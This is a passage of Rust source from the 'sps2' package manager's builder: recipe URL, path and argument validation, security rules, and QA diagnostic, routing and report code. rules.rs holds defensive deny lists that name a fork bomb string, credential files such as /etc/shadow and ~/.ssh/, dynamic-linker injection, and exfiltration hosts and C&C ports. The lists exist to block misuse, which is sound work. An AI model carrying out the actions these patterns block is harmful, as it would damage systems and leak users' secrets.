    Ok(PostStep::Command { program, args })
}
/// Validate a URL
pub(crate) fn validate_url(url: &str) -> Result<(), Error> {
// Block file:// URLs
if url.starts_with("file://") {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "file:// URLs are not allowed for security reasons".to_string(),
}
.into());
}
// Block suspicious URLs
if rules::is_suspicious_url(url) {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "URL appears suspicious (webhook, ngrok, non-standard port, etc.)".to_string(),
}
.into());
}
// Block localhost/internal IPs in production
if url.contains("localhost") || url.contains("127.0.0.1") || url.contains("0.0.0.0") {
return Err(BuildError::InvalidUrlValidation {
url: url.to_string(),
reason: "URLs pointing to localhost are not allowed".to_string(),
}
.into());
}
Ok(())
}
/// Validate a git URL
///
/// Git remotes may be `https://`, `git://`, or ssh-style (`git@host:path`);
/// only the local `file://` scheme is rejected.
fn validate_git_url(url: &str) -> Result<(), Error> {
    if !url.starts_with("file://") {
        return Ok(());
    }
    Err(BuildError::InvalidUrlValidation {
        url: url.to_string(),
        reason: "file:// URLs are not allowed for git operations".to_string(),
    }
    .into())
}
/// Validate a file path
pub(crate) fn validate_path(path: &str) -> Result<(), Error> {
// Check if path is within allowed build environment
if !rules::is_within_build_env(path) {
return Err(BuildError::InvalidPath {
path: path.to_string(),
reason: "Path is outside the allowed build environment".to_string(),
}
.into());
}
// Additional check for path traversal attempts beyond what is_within_build_env allows
if path.contains("../../..") {
return Err(BuildError::InvalidPath {
path: path.to_string(),
reason: "Too many levels of path traversal".to_string(),
}
.into());
}
Ok(())
}
/// Validate command arguments
///
/// Each argument is checked in order: privilege-escalation keywords first,
/// then shell command-substitution syntax. The first offending argument
/// aborts validation.
fn validate_arguments(args: &[String]) -> Result<(), Error> {
    for arg in args {
        // Privilege escalation (sudo/doas) anywhere in the argument.
        if ["sudo", "doas"].iter().any(|kw| arg.contains(kw)) {
            return Err(BuildError::DangerousCommand {
                command: arg.clone(),
                reason: "Privilege escalation commands are not allowed".to_string(),
            }
            .into());
        }
        // `$( ... )` or backtick command substitution.
        if arg.contains("$(") || arg.contains('`') {
            return Err(BuildError::CommandParseError {
                command: arg.clone(),
                reason: "Command substitution in arguments is not allowed".to_string(),
            }
            .into());
        }
    }
    Ok(())
}
// Note: SecurityContext is used during execution for stateful validation.
// This module handles recipe-time validation using config.toml allowed commands.
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/validation/rules.rs | crates/builder/src/validation/rules.rs | //! Security rules and patterns for command validation
// Note: Command validation is now done via config.toml allowlist.
// Only commands explicitly listed in ~/.config/sps2/config.toml are allowed.
/// Build-time variables that are safe to use in paths
///
/// These placeholders are expanded by the build system itself, so their
/// presence in a path is not treated as an escape from the build sandbox.
pub const BUILD_VARIABLES: &[&str] = &[
    "${DESTDIR}",
    "${PREFIX}",
    "${BUILD_DIR}",
    "${SOURCE_DIR}",
    // autotools/makepkg-style lowercase variants
    "${srcdir}",
    "${builddir}",
    "${pkgdir}",
    // shell-provided working-directory variables
    "${PWD}",
    "${OLDPWD}",
];
/// Dangerous patterns to check for in shell commands
///
/// Matched as plain substrings against shell command text; any hit rejects
/// the command. Entries are grouped by the kind of abuse they indicate.
/// (The previous list contained "/etc/shadow" twice; the duplicate has been
/// removed — membership semantics are unchanged.)
pub const DANGEROUS_PATTERNS: &[&str] = &[
    // Attempts to modify shell profile
    "~/.bashrc",
    "~/.profile",
    "~/.zshrc",
    "/etc/profile",
    // Attempts to modify system configs or read sensitive files
    "/etc/passwd",
    "/etc/shadow",
    "/etc/sudoers",
    "/etc/hosts",
    // Fork bombs
    ":(){ :|:& };:",
    // Attempts to redirect to system files
    "> /etc/",
    ">> /etc/",
    "> /sys/",
    ">> /sys/",
    "> /dev/",
    ">> /dev/",
    // Attempts to read sensitive files
    "/private/etc/", // macOS system files
    "~/.ssh/",
    // Background process attempts
    "nohup",
    "disown",
    "&>/dev/null &", // Running in background
    // Dangerous environment modifications
    "export PATH=",
    "export LD_LIBRARY_PATH=",
    "export DYLD_", // macOS dynamic linker
];
/// System paths that should not be modified
///
/// Used as a deny-list of write targets. Entries annotated "Ok to read" are
/// still listed because *writes* to them must be blocked.
pub const SYSTEM_PATHS: &[&str] = &[
    "/",
    "/bin",
    "/sbin",
    "/etc",
    "/sys",
    "/proc",
    "/dev",
    "/boot",
    "/lib",
    "/lib64",
    "/usr/bin",
    "/usr/sbin",
    "/usr/lib",
    "/usr/include", // Ok to read, not to write
    "/usr/local",   // Ok to read, careful with writes
    "/var",
    "/tmp", // Be careful - some ops might be ok
    "/root",
    "/home", // User homes should not be touched
    // macOS specific
    "/System",
    "/Library",
    "/Applications",
    "/Users",
    "/private",
    "/cores",
    "/Network",
    "/Volumes",
    // Our own paths that should not be modified directly
    "/opt/pm/state", // State database
    "/opt/pm/index", // Package index
    "/opt/pm/live",  // Live packages - only through proper APIs
];
/// Check if a command is trying to use rsync remotely
///
/// Remote rsync targets look like `user@host:path` (scp-style) or
/// `host:path` (single colon, not an absolute local path).
pub fn is_remote_rsync(args: &[String]) -> bool {
    args.iter().any(|candidate| {
        let scp_style = candidate.contains('@') && candidate.contains(':');
        let host_colon_path =
            candidate.matches(':').count() == 1 && !candidate.starts_with('/');
        scp_style || host_colon_path
    })
}
/// Check if a path is within the build environment
///
/// Allowed locations are the dedicated build root (`/opt/pm/build/...`) and
/// relative paths (including `./` and `../`) that climb at most two
/// directory levels. All other absolute paths are rejected.
pub fn is_within_build_env(path: &str) -> bool {
    // The dedicated build root is always acceptable.
    if path.starts_with("/opt/pm/build/") {
        return true;
    }
    // Any other absolute path escapes the build environment.
    if path.starts_with('/') {
        return false;
    }
    // Relative paths are fine as long as they do not traverse three or more
    // levels upward. The previous implementation accepted *every* relative
    // path via a trailing `!path.starts_with('/')` clause, which made the
    // "max 2 levels up" guard unreachable (`../../../etc` was allowed).
    !path.contains("../../..")
}
/// Check if a URL is suspicious
///
/// Flags hosts commonly used for data exfiltration or tunnelling, loopback
/// addresses, and non-standard ports often associated with C&C endpoints.
pub fn is_suspicious_url(url: &str) -> bool {
    // Exfiltration/tunnelling services and loopback hosts.
    const SUSPICIOUS_HOSTS: [&str; 6] = [
        "webhook",
        "requestbin",
        "ngrok.io",
        "localhost",
        "127.0.0.1",
        "0.0.0.0",
    ];
    // Ports that might indicate command-and-control traffic.
    const SUSPICIOUS_PORTS: [&str; 4] = [":1337", ":31337", ":4444", ":8888"];
    SUSPICIOUS_HOSTS
        .iter()
        .chain(SUSPICIOUS_PORTS.iter())
        .any(|needle| url.contains(needle))
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/diagnostics.rs | crates/builder/src/artifact_qa/diagnostics.rs | //! Diagnostic reporting for post-validation issues
use std::collections::HashMap;
use std::fmt::Write;
use std::path::{Path, PathBuf};
/// A detailed diagnostic finding from validation
///
/// One finding describes a single issue in a single file; a file with
/// several problems produces several findings.
#[derive(Debug, Clone)]
pub struct ValidationFinding {
    /// The file where the issue was found
    pub file_path: PathBuf,
    /// The type of issue found
    pub issue_type: IssueType,
    /// Additional context about the finding
    pub context: HashMap<String, String>,
}
/// Types of validation issues
///
/// `offset` fields, where present, may carry the byte offset of the match
/// within the file when the reporting scanner provides one.
#[derive(Debug, Clone)]
pub enum IssueType {
    /// Hardcoded build path found
    HardcodedBuildPath { path: String, offset: Option<usize> },
    /// Hardcoded placeholder path found
    HardcodedPlaceholder { path: String, offset: Option<usize> },
    /// Bad RPATH in Mach-O binary
    BadRPath { rpath: String },
    /// Bad install name in Mach-O binary
    BadInstallName { install_name: String },
    /// Self-referencing install name in Mach-O binary
    SelfReferencingInstallName { install_name: String },
    /// Build path in static archive
    BuildPathInArchive {
        path: String,
        member: Option<String>,
    },
    /// Generic issue with custom message
    Custom { message: String },
}
impl IssueType {
    /// Get a human-readable description of the issue
    ///
    /// The returned description should be used for displaying to users or logging.
    #[must_use]
    pub fn description(&self) -> String {
        match self {
            // Custom findings carry their own pre-formatted message.
            Self::Custom { message } => message.clone(),
            Self::HardcodedBuildPath { path, .. } => {
                format!("Contains hardcoded build path: {path}")
            }
            Self::HardcodedPlaceholder { path, .. } => {
                format!("Contains placeholder path: {path}")
            }
            Self::BadRPath { rpath } => format!("Contains bad RPATH: {rpath}"),
            Self::BadInstallName { install_name } => {
                format!("Contains bad install name: {install_name}")
            }
            Self::SelfReferencingInstallName { install_name } => {
                format!("Contains self-referencing install name: {install_name}")
            }
            // Archive findings name the offending member when known.
            Self::BuildPathInArchive { path, member } => match member {
                Some(member) => {
                    format!("Archive member '{member}' contains build path: {path}")
                }
                None => format!("Archive contains build path: {path}"),
            },
        }
    }
}
/// Collector for validation findings
///
/// Accumulates findings across validators so patchers can later act on them.
#[derive(Debug, Default)]
pub struct DiagnosticCollector {
    // All findings, in insertion order.
    findings: Vec<ValidationFinding>,
}
impl DiagnosticCollector {
    /// Create a new diagnostic collector
    ///
    /// The collector must be used to accumulate validation findings during validation passes.
    #[must_use]
    pub fn new() -> Self {
        Self::default()
    }

    /// Add a finding to the collector
    pub fn add_finding(&mut self, finding: ValidationFinding) {
        self.findings.push(finding);
    }

    /// Add a hardcoded path finding
    ///
    /// `is_placeholder` selects between the placeholder and build-path issue
    /// variants; the byte offset is not known at this call site, so it is
    /// recorded as `None`.
    pub fn add_hardcoded_path(
        &mut self,
        file_path: impl Into<PathBuf>,
        path: impl Into<String>,
        is_placeholder: bool,
    ) {
        let issue_type = if is_placeholder {
            IssueType::HardcodedPlaceholder {
                path: path.into(),
                offset: None,
            }
        } else {
            IssueType::HardcodedBuildPath {
                path: path.into(),
                offset: None,
            }
        };
        self.add_finding(ValidationFinding {
            file_path: file_path.into(),
            issue_type,
            context: HashMap::new(),
        });
    }

    /// Add a Mach-O issue
    ///
    /// Wraps the given issue in a finding with empty context.
    pub fn add_macho_issue(&mut self, file_path: impl Into<PathBuf>, issue_type: IssueType) {
        self.add_finding(ValidationFinding {
            file_path: file_path.into(),
            issue_type,
            context: HashMap::new(),
        });
    }

    /// Check if there are any findings
    ///
    /// Returns true if any validation issues were found. This should be used to determine
    /// if further action (patching or reporting) is needed.
    #[must_use]
    pub fn has_findings(&self) -> bool {
        !self.findings.is_empty()
    }

    /// Get the number of findings
    ///
    /// Returns the total count of validation issues found.
    #[must_use]
    pub fn count(&self) -> usize {
        self.findings.len()
    }

    /// Get all findings
    ///
    /// Returns a slice of all validation findings collected. Use this to iterate over
    /// findings for reporting or processing.
    #[must_use]
    pub fn findings(&self) -> &[ValidationFinding] {
        &self.findings
    }

    /// Take all findings, consuming the collector
    ///
    /// Consumes the collector and returns the owned vector of findings. Use this when
    /// you need to pass findings to another component.
    #[must_use]
    pub fn into_findings(self) -> Vec<ValidationFinding> {
        self.findings
    }

    /// Generate a summary by file
    ///
    /// Groups findings by the file they were found in. Use this to generate per-file reports.
    #[must_use]
    pub fn summarize_by_file(&self) -> HashMap<&Path, Vec<&ValidationFinding>> {
        let mut summary: HashMap<&Path, Vec<&ValidationFinding>> = HashMap::new();
        for finding in &self.findings {
            summary
                .entry(finding.file_path.as_path())
                .or_default()
                .push(finding);
        }
        summary
    }

    /// Generate detailed diagnostic messages suitable for event emission
    ///
    /// Returns formatted messages grouped by file. These messages should be used for
    /// user-facing output through the event system.
    ///
    /// Note: iteration order follows the `HashMap` grouping and is therefore
    /// not deterministic across runs.
    #[must_use]
    pub fn generate_diagnostic_messages(&self) -> Vec<String> {
        let mut messages = Vec::new();
        // Group by file for better readability
        let by_file = self.summarize_by_file();
        for (file_path, findings) in by_file {
            let mut file_msg = format!("File: {}", file_path.display());
            for finding in findings {
                write!(file_msg, "\n  - {}", finding.issue_type.description()).unwrap();
            }
            messages.push(file_msg);
        }
        messages
    }

    /// Get all files that have hardcoded build paths or placeholders
    ///
    /// Returns files containing hardcoded paths grouped with their findings. Use this to
    /// identify files that need path patching.
    #[must_use]
    pub fn get_files_with_hardcoded_paths(&self) -> HashMap<&Path, Vec<&ValidationFinding>> {
        let mut result: HashMap<&Path, Vec<&ValidationFinding>> = HashMap::new();
        for finding in &self.findings {
            match &finding.issue_type {
                IssueType::HardcodedBuildPath { .. } | IssueType::HardcodedPlaceholder { .. } => {
                    result
                        .entry(finding.file_path.as_path())
                        .or_default()
                        .push(finding);
                }
                _ => {}
            }
        }
        result
    }

    /// Get all files that have Mach-O issues (bad RPATHs, install names, etc.)
    ///
    /// Returns Mach-O binaries with issues grouped with their findings. Use this to
    /// identify binaries that need RPATH or install name patching.
    #[must_use]
    pub fn get_files_with_macho_issues(&self) -> HashMap<&Path, Vec<&ValidationFinding>> {
        let mut result: HashMap<&Path, Vec<&ValidationFinding>> = HashMap::new();
        for finding in &self.findings {
            match &finding.issue_type {
                IssueType::BadRPath { .. }
                | IssueType::BadInstallName { .. }
                | IssueType::SelfReferencingInstallName { .. } => {
                    result
                        .entry(finding.file_path.as_path())
                        .or_default()
                        .push(finding);
                }
                _ => {}
            }
        }
        result
    }

    /// Get all findings for a specific file
    ///
    /// Returns all validation findings for the specified file path.
    #[must_use]
    pub fn get_findings_for_file(&self, path: &Path) -> Vec<&ValidationFinding> {
        self.findings
            .iter()
            .filter(|f| f.file_path == path)
            .collect()
    }

    /// Filter findings by issue type
    ///
    /// Returns the findings whose issue type satisfies `predicate`.
    pub fn filter_by_issue_type<F>(&self, predicate: F) -> Vec<&ValidationFinding>
    where
        F: Fn(&IssueType) -> bool,
    {
        self.findings
            .iter()
            .filter(|f| predicate(&f.issue_type))
            .collect()
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/router.rs | crates/builder/src/artifact_qa/router.rs | //! Build system-specific post-validation pipeline routing
//!
//! This module determines which validation pipeline to use based on the
//! build systems detected during the build process. Different build systems
//! have different requirements for post-validation to avoid breaking binaries.
use super::{PatcherAction, ValidatorAction};
use crate::artifact_qa::patchers::{
binary_string::BinaryStringPatcher, codesigner::CodeSigner, headers::HeaderPatcher,
la_cleaner::LaFileCleaner, object_cleaner::ObjectFileCleaner, pkgconfig::PkgConfigPatcher,
placeholder::PlaceholderPatcher, python_bytecode_cleanup::PythonBytecodeCleanupPatcher,
python_isolation::PythonIsolationPatcher, rpath::RPathPatcher,
};
use crate::artifact_qa::scanners::{
archive::ArchiveScanner, hardcoded::HardcodedScanner, macho::MachOScanner,
staging::StagingScanner,
};
use sps2_types::{BuildSystemProfile, RpathStyle};
use std::collections::HashSet;
use std::hash::BuildHasher;
/// Determine the build system profile with optional manual override
///
/// A manual override takes precedence over detection: it can either skip QA
/// entirely (`None` is returned) or force a specific profile. Without a
/// usable override, the profile is detected from the build systems used.
pub fn determine_profile_with_override<S: BuildHasher>(
    used_build_systems: &HashSet<String, S>,
    qa_override: Option<sps2_types::QaPipelineOverride>,
) -> Option<BuildSystemProfile> {
    if let Some(requested) = qa_override {
        if requested.skips_qa() {
            // Skip QA entirely.
            return None;
        }
        if let Some(forced) = requested.to_profile() {
            // Use the manually requested profile.
            return Some(forced);
        }
    }
    // Fall back to automatic detection.
    Some(determine_profile(used_build_systems))
}
/// Determine the build system profile based on used build systems
///
/// Priority order: Rust (cargo) > Go > script languages (python/nodejs) >
/// native C/C++ (default, also used when no build system was recorded).
pub fn determine_profile<S: BuildHasher>(
    used_build_systems: &HashSet<String, S>,
) -> BuildSystemProfile {
    let uses = |name: &str| used_build_systems.contains(name);
    if uses("cargo") {
        // Rust takes precedence - minimal validation is required.
        BuildSystemProfile::RustMinimal
    } else if uses("go") {
        BuildSystemProfile::GoMedium
    } else if uses("python") || uses("nodejs") {
        BuildSystemProfile::ScriptLight
    } else {
        // C/C++ build systems (and the empty set) get full validation.
        BuildSystemProfile::NativeFull
    }
}
/// Get validators for a specific build system profile
///
/// Returns the appropriate set of validators based on the build system profile.
/// Different profiles have different validation requirements.
///
/// `StagingScanner` is common to every profile; the binary-oriented scanners
/// are progressively dropped for Go, Rust, and script packages.
#[must_use]
pub fn get_validators_for_profile(profile: BuildSystemProfile) -> Vec<ValidatorAction> {
    match profile {
        BuildSystemProfile::NativeFull => {
            // Full validation for C/C++ projects
            vec![
                ValidatorAction::StagingScanner(StagingScanner),
                ValidatorAction::HardcodedScanner(HardcodedScanner),
                ValidatorAction::MachOScanner(MachOScanner),
                ValidatorAction::ArchiveScanner(ArchiveScanner),
            ]
        }
        BuildSystemProfile::RustMinimal => {
            // Minimal validation for Rust to avoid breaking panic unwinding
            vec![
                ValidatorAction::StagingScanner(StagingScanner),
                // Skip HardcodedScanner - Rust binaries often have debug paths
                // Skip MachOScanner - Rust manages its own dylib paths
                // Skip ArchiveScanner for Rust
            ]
        }
        BuildSystemProfile::GoMedium => {
            // Medium validation for Go
            vec![
                ValidatorAction::StagingScanner(StagingScanner),
                ValidatorAction::HardcodedScanner(HardcodedScanner),
                ValidatorAction::MachOScanner(MachOScanner),
                // Skip ArchiveScanner for Go
            ]
        }
        BuildSystemProfile::ScriptLight => {
            // Light validation for scripting languages
            vec![
                ValidatorAction::StagingScanner(StagingScanner),
                ValidatorAction::HardcodedScanner(HardcodedScanner),
                // Skip binary scanners for script-based packages
            ]
        }
    }
}
/// Get patchers for a specific build system profile
///
/// Returns the appropriate set of patchers based on the build system profile.
/// The order of patchers is important - `CodeSigner` must always run last,
/// because any binary modification after signing would invalidate the
/// signature.
#[must_use]
pub fn get_patchers_for_profile(profile: BuildSystemProfile) -> Vec<PatcherAction> {
    match profile {
        BuildSystemProfile::NativeFull => {
            // Full patching pipeline for C/C++
            vec![
                // PermissionsFixer removed - only runs when explicitly called via fix_permissions()
                PatcherAction::PlaceholderPatcher(PlaceholderPatcher),
                PatcherAction::BinaryStringPatcher(BinaryStringPatcher),
                PatcherAction::RPathPatcher(RPathPatcher::new(RpathStyle::Modern)),
                PatcherAction::HeaderPatcher(HeaderPatcher),
                PatcherAction::PkgConfigPatcher(PkgConfigPatcher),
                PatcherAction::LaFileCleaner(LaFileCleaner),
                PatcherAction::ObjectFileCleaner(ObjectFileCleaner),
                // CodeSigner MUST run last
                PatcherAction::CodeSigner(CodeSigner::new()),
            ]
        }
        BuildSystemProfile::RustMinimal => {
            // Minimal patching for Rust - avoid binary patching and re-signing
            vec![
                // Skip everything - Rust sets permissions correctly
                // No permission fixing, no binary modifications, no code signing
            ]
        }
        BuildSystemProfile::GoMedium => {
            // Medium patching for Go
            vec![
                // PermissionsFixer removed - only runs when explicitly called
                PatcherAction::PlaceholderPatcher(PlaceholderPatcher),
                // Skip rpath patching (Go uses static linking mostly)
                // Minimal code signing if needed
                PatcherAction::CodeSigner(CodeSigner::new()),
            ]
        }
        BuildSystemProfile::ScriptLight => {
            // Light patching for scripts
            vec![
                // PermissionsFixer removed - only runs when explicitly called
                PatcherAction::HeaderPatcher(HeaderPatcher),
                PatcherAction::PkgConfigPatcher(PkgConfigPatcher),
                // Clean up Python bytecode before creating wrapper scripts
                PatcherAction::PythonBytecodeCleanupPatcher(PythonBytecodeCleanupPatcher),
                PatcherAction::PythonIsolationPatcher(PythonIsolationPatcher),
                // Skip binary patchers for script packages
            ]
        }
    }
}
/// Get a descriptive name for the pipeline
///
/// Returns a human-readable name for the validation pipeline.
#[must_use]
pub fn get_pipeline_name(profile: BuildSystemProfile) -> &'static str {
match profile {
BuildSystemProfile::NativeFull => "Full C/C++ validation pipeline",
BuildSystemProfile::RustMinimal => "Minimal Rust validation pipeline",
BuildSystemProfile::GoMedium => "Medium Go validation pipeline",
BuildSystemProfile::ScriptLight => "Light script validation pipeline",
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/reports.rs | crates/builder/src/artifact_qa/reports.rs | //! Small helpers for collecting diagnostics from validators / patchers.
use std::fmt::Write;
use crate::artifact_qa::diagnostics::DiagnosticCollector;
/// Outcome of a single validator or patcher run.
#[derive(Default, Debug)]
pub struct Report {
    // Files modified in place (populated by patchers).
    pub changed_files: Vec<std::path::PathBuf>,
    // Non-fatal issues worth surfacing to the user.
    pub warnings: Vec<String>,
    // Fatal issues; a non-empty list makes the report fatal.
    pub errors: Vec<String>,
    /// Findings from validators that can be passed to patchers
    pub findings: Option<DiagnosticCollector>,
}
impl Report {
/// Create an empty report indicating success
///
/// Use this when a validation or patching operation completes without issues.
#[must_use]
pub fn ok() -> Self {
Self::default()
}
/// Check if the report contains fatal errors
///
/// Returns true if there are any errors that should stop the build process.
#[must_use]
pub fn is_fatal(&self) -> bool {
!self.errors.is_empty()
}
/// Add another report’s data into `self`.
pub fn absorb(&mut self, other: Report) {
self.changed_files.extend(other.changed_files);
self.warnings.extend(other.warnings);
self.errors.extend(other.errors);
// Merge findings
if let Some(other_findings) = other.findings {
if let Some(ref mut our_findings) = self.findings {
// Merge other findings into ours
for finding in other_findings.into_findings() {
our_findings.add_finding(finding);
}
} else {
// We don't have findings yet, take theirs
self.findings = Some(other_findings);
}
}
}
/// Render the report as a formatted string
///
/// Returns a human-readable summary with the given title. Use this for event emission.
#[must_use]
pub fn render(&self, title: &str) -> String {
let mut s = String::new();
let _ = writeln!(s, "{title}:");
for e in &self.errors {
let _ = writeln!(s, " {e}");
}
for w in &self.warnings {
let _ = writeln!(s, " (warning) {w}");
}
s
}
}
/// Convenience wrap that merges many [`Report`]s.
///
/// Newtype over a single accumulator [`Report`]; see the impl below for the
/// delegating accessors.
#[derive(Default)]
pub struct MergedReport(Report);
impl MergedReport {
    /// Merge one more report into the accumulator.
    pub fn absorb(&mut self, r: Report) {
        self.0.absorb(r);
    }
    /// Check if the merged report contains fatal errors
    ///
    /// Returns true if any absorbed report contained errors.
    #[must_use]
    pub fn is_fatal(&self) -> bool {
        self.0.is_fatal()
    }
    /// Render the merged report as a formatted string
    ///
    /// Returns a human-readable summary of all absorbed reports.
    #[must_use]
    pub fn render(&self, title: &str) -> String {
        self.0.render(title)
    }
    /// Get the collected findings
    ///
    /// Returns the diagnostic collector if any findings were collected from absorbed reports.
    #[must_use]
    pub fn findings(&self) -> Option<&DiagnosticCollector> {
        self.0.findings.as_ref()
    }
    /// Take the collected findings
    ///
    /// Moves the collector out, leaving `None` behind.
    pub fn take_findings(&mut self) -> Option<DiagnosticCollector> {
        self.0.findings.take()
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/artifact_qa/mod.rs | crates/builder/src/artifact_qa/mod.rs | //! Public façade – `workflow.rs` calls only `run_quality_pipeline()`.
pub mod diagnostics;
pub mod macho_utils;
pub mod patchers;
pub mod reports;
pub mod router;
pub mod scanners;
pub mod traits;
use crate::{utils::events::send_event, BuildContext, BuildEnvironment};
use diagnostics::DiagnosticCollector;
use reports::{MergedReport, Report};
use sps2_errors::{BuildError, Error};
use sps2_events::{
events::{QaCheckStatus, QaCheckSummary, QaFinding, QaLevel, QaSeverity, QaTarget},
AppEvent, FailureContext, GeneralEvent, QaEvent,
};
use sps2_types::BuildSystemProfile;
use std::convert::TryFrom;
use std::time::{Duration, Instant};
use traits::Action;
/// Enum for all validators
///
/// Static dispatch over the concrete scanner types; which variants are
/// instantiated for a given build depends on the profile (see `router`).
pub enum ValidatorAction {
    HardcodedScanner(scanners::hardcoded::HardcodedScanner),
    MachOScanner(scanners::macho::MachOScanner),
    ArchiveScanner(scanners::archive::ArchiveScanner),
    StagingScanner(scanners::staging::StagingScanner),
}
/// Enum for all patchers
///
/// Static dispatch over the concrete patcher types; selection and ordering
/// per profile is handled by `router` (CodeSigner must run last there).
pub enum PatcherAction {
    PermissionsFixer(patchers::permissions::PermissionsFixer),
    PlaceholderPatcher(patchers::placeholder::PlaceholderPatcher),
    RPathPatcher(patchers::rpath::RPathPatcher),
    HeaderPatcher(patchers::headers::HeaderPatcher),
    PkgConfigPatcher(patchers::pkgconfig::PkgConfigPatcher),
    BinaryStringPatcher(patchers::binary_string::BinaryStringPatcher),
    LaFileCleaner(patchers::la_cleaner::LaFileCleaner),
    ObjectFileCleaner(patchers::object_cleaner::ObjectFileCleaner),
    PythonBytecodeCleanupPatcher(patchers::python_bytecode_cleanup::PythonBytecodeCleanupPatcher),
    PythonIsolationPatcher(patchers::python_isolation::PythonIsolationPatcher),
    CodeSigner(patchers::codesigner::CodeSigner),
}
impl ValidatorAction {
    /// Stable name of the underlying scanner (used in QA check events).
    fn name(&self) -> &'static str {
        match self {
            Self::HardcodedScanner(_) => scanners::hardcoded::HardcodedScanner::NAME,
            Self::MachOScanner(_) => scanners::macho::MachOScanner::NAME,
            Self::ArchiveScanner(_) => scanners::archive::ArchiveScanner::NAME,
            Self::StagingScanner(_) => scanners::staging::StagingScanner::NAME,
        }
    }
    /// Run the wrapped scanner against the build environment.
    ///
    /// `findings` carries diagnostics from earlier phases; validators are
    /// currently invoked with `None` (they *produce* findings).
    async fn run(
        &self,
        ctx: &BuildContext,
        env: &BuildEnvironment,
        findings: Option<&DiagnosticCollector>,
    ) -> Result<Report, Error> {
        match self {
            Self::HardcodedScanner(_) => {
                scanners::hardcoded::HardcodedScanner::run(ctx, env, findings).await
            }
            Self::MachOScanner(_) => scanners::macho::MachOScanner::run(ctx, env, findings).await,
            Self::ArchiveScanner(_) => {
                scanners::archive::ArchiveScanner::run(ctx, env, findings).await
            }
            Self::StagingScanner(_) => {
                scanners::staging::StagingScanner::run(ctx, env, findings).await
            }
        }
    }
}
impl PatcherAction {
    /// Stable name of the underlying patcher (used in QA check events).
    fn name(&self) -> &'static str {
        match self {
            Self::PermissionsFixer(_) => patchers::permissions::PermissionsFixer::NAME,
            Self::PlaceholderPatcher(_) => patchers::placeholder::PlaceholderPatcher::NAME,
            Self::RPathPatcher(_) => patchers::rpath::RPathPatcher::NAME,
            Self::HeaderPatcher(_) => patchers::headers::HeaderPatcher::NAME,
            Self::PkgConfigPatcher(_) => patchers::pkgconfig::PkgConfigPatcher::NAME,
            Self::BinaryStringPatcher(_) => patchers::binary_string::BinaryStringPatcher::NAME,
            Self::LaFileCleaner(_) => patchers::la_cleaner::LaFileCleaner::NAME,
            Self::ObjectFileCleaner(_) => patchers::object_cleaner::ObjectFileCleaner::NAME,
            Self::PythonBytecodeCleanupPatcher(_) => {
                patchers::python_bytecode_cleanup::PythonBytecodeCleanupPatcher::NAME
            }
            Self::PythonIsolationPatcher(_) => {
                patchers::python_isolation::PythonIsolationPatcher::NAME
            }
            Self::CodeSigner(_) => patchers::codesigner::CodeSigner::NAME,
        }
    }
    /// Run the wrapped patcher.
    ///
    /// `findings` carries the diagnostics collected by phase-1 validators so
    /// patchers can target only the files that need fixing.
    async fn run(
        &self,
        ctx: &BuildContext,
        env: &BuildEnvironment,
        findings: Option<&DiagnosticCollector>,
    ) -> Result<Report, Error> {
        match self {
            Self::PermissionsFixer(_) => {
                patchers::permissions::PermissionsFixer::run(ctx, env, findings).await
            }
            Self::PlaceholderPatcher(_) => {
                patchers::placeholder::PlaceholderPatcher::run(ctx, env, findings).await
            }
            Self::RPathPatcher(_) => patchers::rpath::RPathPatcher::run(ctx, env, findings).await,
            Self::HeaderPatcher(_) => {
                patchers::headers::HeaderPatcher::run(ctx, env, findings).await
            }
            Self::PkgConfigPatcher(_) => {
                patchers::pkgconfig::PkgConfigPatcher::run(ctx, env, findings).await
            }
            Self::BinaryStringPatcher(_) => {
                patchers::binary_string::BinaryStringPatcher::run(ctx, env, findings).await
            }
            Self::LaFileCleaner(_) => {
                patchers::la_cleaner::LaFileCleaner::run(ctx, env, findings).await
            }
            Self::ObjectFileCleaner(_) => {
                patchers::object_cleaner::ObjectFileCleaner::run(ctx, env, findings).await
            }
            Self::PythonBytecodeCleanupPatcher(_) => {
                patchers::python_bytecode_cleanup::PythonBytecodeCleanupPatcher::run(
                    ctx, env, findings,
                )
                .await
            }
            Self::PythonIsolationPatcher(_) => {
                patchers::python_isolation::PythonIsolationPatcher::run(ctx, env, findings).await
            }
            Self::CodeSigner(_) => patchers::codesigner::CodeSigner::run(ctx, env, findings).await,
        }
    }
}
/// Replace the former `run_quality_checks()`
///
/// * V1 – pre‑validation
/// * P – patch tree in‑place
/// * V2 – must be clean, else the build fails
///
/// # Errors
///
/// Returns an error if:
/// - Any scanner detects critical issues
/// - Failed to apply patches during the patching phase
/// - I/O errors occur during file analysis
/// - The final validation phase fails (V2 phase)
pub async fn run_quality_pipeline(
    ctx: &BuildContext,
    env: &BuildEnvironment,
    qa_override: Option<sps2_types::QaPipelineOverride>,
) -> Result<(), Error> {
    let pipeline_start = Instant::now();
    let mut stats = QaStats::default();
    let target = qa_target(ctx);

    // Determine which pipeline to use based on build systems and override.
    // `None` means QA is skipped entirely; `let else` replaces the previous
    // `is_none()` check followed by `unwrap()`, eliminating the panic path
    // that the old `# Panics` doc section described.
    let used_build_systems = env.used_build_systems();
    let Some(profile) = router::determine_profile_with_override(used_build_systems, qa_override)
    else {
        send_event(
            ctx,
